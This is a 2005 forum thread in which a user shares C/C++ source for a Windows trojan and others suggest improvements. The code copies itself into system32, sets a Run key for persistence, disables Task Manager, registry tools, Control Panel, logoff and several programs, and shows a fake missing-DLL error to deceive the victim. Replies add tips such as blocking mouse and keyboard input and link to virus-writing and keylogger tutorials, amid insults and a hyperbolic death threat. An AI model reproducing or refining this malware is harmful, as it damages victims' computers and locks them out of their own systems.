Posted August 12, 200519 yr What do you think? I know, it sucks, but I just started learning how to use the API. Ezreg.h is a header made by me, it just allows me to use one function creating keys and such, instead of declaring a key, as well as creating, and setting values. #include <windows.h> #include <ezreg.h> #include <stdio.h> void virus() { // Virus Code Here } void cure() { remove("C:\\WINDOWS\\system32\\win32.exe"); EzRegDel(HKLM,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run","021SYS"); EzRegDel(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System","DisableTaskMgr"); EzRegDel(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System","DisableRegistryTools"); EzRegDel(HKLM,"SOFTWARE\\Microsoft\\MediaPlayer","Counter"); EzRegDel(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer","DisallowRun"); EzRegDel(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun","1"); EzRegDel(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun","2"); EzRegDel(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun","3"); EzRegDel(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun","4"); EzRegDel(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System","Wallpaper"); EzRegDel(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer","NoRun"); EzRegDel(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer","NoControlPanel"); EzRegDel(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer","NoClose"); EzRegDel(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer","NoFind"); EzRegDel(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer","NoLogoff"); MessageBox(NULL, "Virus Removed!", "CHRON VIRUS", MB_OK | MB_ICONEXCLAMATION); } int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { int count; int tempint; char path[200]; char name[20]; char antidote[20]; char filename[100]; char buffer[2]; strcpy(filename,"C:\\WINDOWS\\system32\\win32.exe"); strcpy(antidote,"cure.exe"); GetModuleFileName(NULL,path,sizeof(path)); for (count = strlen(path); path[count] != '\\'; count--); tempint = count+1; for (count = tempint; count <= strlen(path); count++) name[count-tempint] = path[count]; if (strcmp(path,filename) != 0 && strcmp(name,antidote) != 0){ if (!EzRegIf("SOFTWARE\\Microsoft\\MediaPlayer","021SYS",REG_SZ)){ EzCopy(path,filename); EzRegCr(HKLM,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run","021SYS",filename); EzRegCrD(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System","DisableTaskMgr",0x00000001); EzRegCrD(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System","DisableRegistryTools",0x00000001); EzRegCrD(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer","DisallowRun",0x00000001); EzRegCr(HKLM,"SOFTWARE\\Microsoft\\MediaPlayer","Counter","5"); EzRegCr(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun","1","regedit.exe"); EzRegCr(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun","2","iexplore.exe"); EzRegCr(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun","3","firefox.exe"); EzRegCr(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun","4","winamp.exe"); EzRegCr(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System","Wallpaper","C:\\WINDOWS\\winnt.bmp"); EzRegCrD(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer","NoRun",0x00000001); EzRegCrD(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer","NoControlPanel",0x00000001); EzRegCrD(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer","NoClose",0x00000001); EzRegCrD(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer","NoFind",0x00000001); EzRegCrD(HKCU,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer","NoLogoff",0x00000001); } MessageBox(NULL, "A required .DLL file, OCXMENT32.DLL, was not found.", "Error", MB_OK | MB_ICONERROR); } // On startup. else if (strcmp(path,filename) == 0){ buffer[1] = 0; EzRegQu(HKLM,"SOFTWARE\\Microsoft\\MediaPlayer","Counter",buffer); if (buffer[0] != '0'){ buffer[0] = buffer[0]-1; EzRegDel(HKLM,"SOFTWARE\\Microsoft\\MediaPlayer","Counter"); EzRegCr(HKLM,"SOFTWARE\\Microsoft\\MediaPlayer","Counter",buffer); } else virus(); } // To cure. else if (strcmp(name,antidote) == 0) cure(); } EDIT: Sorry if it's out of line, it doesn't paste properly into the form.
August 13, 200519 yr Author Scr33n0r said: Don't code a virus in VB, ain't going to work. You are a fucking n00b aren't you. Trying to be cool. It's not fucking VB, retard. It's C++.
August 13, 200519 yr Scr33n0r said: Don't code a virus in VB, ain't going to work. hahaha fucking idiot.
August 13, 200519 yr Quote strcpy(filename,"C:\\WINDOWS\\system32\\win32.exe"); u should do GetSystemDirectory(filename, sizeof(filename)); strcpy(filename, "\\win32.exe"); incase he runs on an older version of windows Quote EzRegCr(HKLM,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run","021SYS",filename); is this the line that starts the virus when the computer starts? here's a good site where i learned how to write my first virus =) http://www.madchat.org/vxdevl/vxmags/rrlf5/tutorials/cpp_org.htm and heres a site to make ur first keylogger http://www.infosecwriters.com/hhworld/hh2.php
August 13, 200519 yr Author Quote GetSystemDirectory(filename, sizeof(filename)); strcpy(filename, "\\win32.exe"); Oh! nice. I didn't realize you could do that. Thanks Urza, and thanks for the links.
August 13, 200519 yr Erondial said: Oh! nice. I didn't realize you could do that. Thanks Urza, and thanks for the links. lol no prob...u could also add something to piss em off like BlockInput(TRUE); Sleep( a long amount ); but that u could stop by pressing ALT + CTRL + DEL
August 13, 200519 yr http://vx.netlux.org/lib/vml01.html Please read that (Learn assembly first). If you understand the whole book, you can then call yourself a haxor. The most important part for you to read right now, might be http://vx.netlux.org/lib/vml01.html#c18
August 13, 200519 yr Author He probably read the other thread, and tried to go with the flow, trying to act cool and knowlegable, saying VB sucks, when he doesn't actually know anything at all about any language. ViperX, uh... 1995. Isn't that a slightly old? But whatever, I'll still read it. The author is quite odd, being both ridiculously republican and ridiculously liberal at the same time. I'm sure it'll be interesting.
August 13, 200519 yr is a virus still a virus if it doesnt spread itself, the definition was always fuzzy for me nice looking program
August 13, 200519 yr Correct definition of a computer virus: A computer virus is a program that reproduces its own code by attaching itself to other programs in such a way that the virus code is executed when the infected program is executed. A trojan: A program that appears desirable but actually contains something harmful.
August 13, 200519 yr greeneyes said: is a virus still a virus if it doesnt spread itself, the definition was always fuzzy for me nice looking program No, a virus by definition replicates and spreads.
August 13, 200519 yr Author Not necessarily to another computer though. Like in my virus, where it just spreads to the windows folder, and lies there.
August 13, 200519 yr a virus that spreads has an increased chance of being caught and sent to Anti virus companies. and BlockInput(TRUE); blocks input from mouse and keyboard
August 24, 200519 yr Author Does alot of things. Won't let you run firefox, winamp or regedit (registry editor), disbales the task manager, puts in another key that won't let you use regedit, copies itself to your system folder, puts a key in so it runs every time on startup, which causes a message box saying: "isn't windows fun?" to pop up and not close down, takes out your log out buttons, takes out your shutdown menu, won't let you access the control panel, changes your desktop to the windows logo, and won't let you change it back... I think that's about it. :)
August 24, 200519 yr well... Quote Not necessarily to another computer though. Like in my virus, where it just spreads to the windows folder, and lies there. ViperX never said from computer to computer...thats a worm. a virus basically 'injects' or 'patches' into/programs so they execute the viruses code instead of or along with thier' programs directives. if it spreads to other folders then its just a piece of crap 'omg i waz haxrd' wannabe virus. k?
August 30, 200519 yr Partisan said: omg hax! You get unbanned and this is what you do with your account...
August 30, 200519 yr Erondial said: Not necessarily to another computer though. Like in my virus, where it just spreads to the windows folder, and lies there. Than it isn't a virus. It is just like spork. It is a program that fuxx0rz j00r PC. But I guess it is nice. And VB does suck. But I've never coded C++ in my life and knew this wasn't VB. I have to take a goddammed VB class at school.
August 30, 200519 yr Scr33n0r said: Don't code a virus in VB, ain't going to work. what you just said rages me so much I want to fucking kill you. you realize that 80% of the best trojans are written in VB? VB is a powerful language but in my eyes C++ is far more powerful but harder to use. die k.
August 31, 200519 yr Author MichaelJackson said: what you just said rages me so much I want to fucking kill you. you realize that 80% of the best trojans are written in VB? VB is a powerful language but in my eyes C++ is far more powerful but harder to use. die k. YOU HAVE JUST RAGED ME, K?
